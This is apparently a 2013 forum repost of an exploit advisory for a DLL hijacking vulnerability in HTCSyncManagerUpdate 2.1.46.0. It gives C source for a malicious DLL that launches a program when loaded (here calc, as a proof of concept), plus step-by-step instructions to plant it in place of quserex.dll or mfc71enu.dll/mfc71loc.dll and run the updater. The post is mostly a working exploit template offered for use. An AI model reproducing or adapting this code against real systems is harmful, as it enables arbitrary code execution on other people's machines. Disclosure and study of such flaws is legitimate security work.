Matt Posted August 12, 2013 Report Posted August 12, 2013 Description : HTCSyncManagerUpdate suffers from a DLL hijacking vulnerability.Author : Iranian_Dark_Coders_TeamSource : HTCSyncManagerUpdate DLL Hijacking ? Packet StormCode : Exploit Title: HTCSyncManagerUpdate (quserex.dll & mfc71enu.dll & mfc71loc.dll ) Path Subversion Arbitrary DLL Injection Code Execution Author: Iranian_Dark_Coders_TeamDiscovered by A.CH12Software Link: http://www.htc.com/Version: 2.1.46.0Tested on: Windows 7// :::'###::::::::::::::::'######::'##::::'##::::'##::::'#######::// ::'## ##::::::::::::::'##... ##: ##:::: ##::'####:::'##.... ##:// :'##:. ##::::::::::::: ##:::..:: ##:::: ##::.. ##:::..::::: ##:// '##:::. ##:::::::::::: ##::::::: #########:::: ##::::'#######::// #########:::::::::::: ##::::::: ##.... ##:::: ##:::'##::::::::// ##.... ##::::'###:::: ##::: ##: ##:::: ##:::: ##::: ##::::::::// ##:::: ##:::: ###::::. ######:: ##:::: ##::'######: #########:// ..:::::..:::::...::::::......:::..:::::..:::......::.........::=============================================================#include <windows.h>#define DllExport __declspec (dllexport)DllExport void DwmSetWindowAttribute() { egg(); }int egg(){ system ("calc"); exit(0); return 0;}=============================================================Instructions:1. Compile dll2. Replace quserex.dll or mfc71enu.dll or mfc71loc.dll in HTC Sync Manager directory with your newly compiled dll3. Launch HTCSyncManagerUpdate4. Bo0o0o0o0o0o0o0m !Greet to my Lovely friends : nimaarek , D.S (ASA); Quote